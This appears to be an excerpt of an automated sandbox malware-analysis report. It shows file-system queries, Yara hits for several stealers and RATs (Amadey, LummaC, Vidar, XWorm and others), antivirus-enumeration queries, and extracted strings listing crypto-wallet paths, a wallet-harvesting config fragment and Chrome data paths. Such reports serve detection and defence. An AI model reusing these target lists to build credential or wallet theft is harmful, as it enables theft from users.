Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0062CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_0062CBEA

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0046E652 GetUserNameW,

20_2_0046E652

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0044BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

20_2_0044BCD2

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

8_2_00406831

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: 8a7032211b.exe, 0000001D.00000003.3003866879.000000000112B000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000002.3132691754.000000000112B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: 2328527160.exe, 00000018.00000002.2690470302.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3027709654.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000002.3112742793.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2881036973.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2854254656.0000000000986000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3060269484.0000000001243000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203782125.0000000001243000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3153277151.0000000001243000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2E02vIiMfd.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1697769446.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1728546022.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1769320101.0000000000611000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1758500681.0000000000611000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738033448.0000000000A21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4184886645.0000000000611000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1959401414.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2328527160.exe PID: 3396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8a7032211b.exe PID: 4464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 714ab8b5fd.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 22.0.2328527160.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.2328527160.exe.3f19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.2328527160.exe.3f19550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2236560137.0000000000AC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2569687773.0000000003F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000024.00000002.4195692760.0000000002C61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.4194980301.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crossplatformplayer.exe PID: 4856, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 20.2.Appeal.com.4fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3028149914.0000000003B1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Appeal.com PID: 4340, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4194977140.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6264, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.,*.txt
Source: Appeal.com, 00000014.00000002.3602824876.0000000001C23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: Appeal.com, 00000014.00000002.3721304907.0000000004ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 8a7032211b.exe, 0000001D.00000003.2822878361.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nce","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"57X^
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.,*.txt
Source: Appeal.com, 00000014.00000002.3595548250.0000000001B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Appeal.com, 00000014.00000002.3721304907.0000000004ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
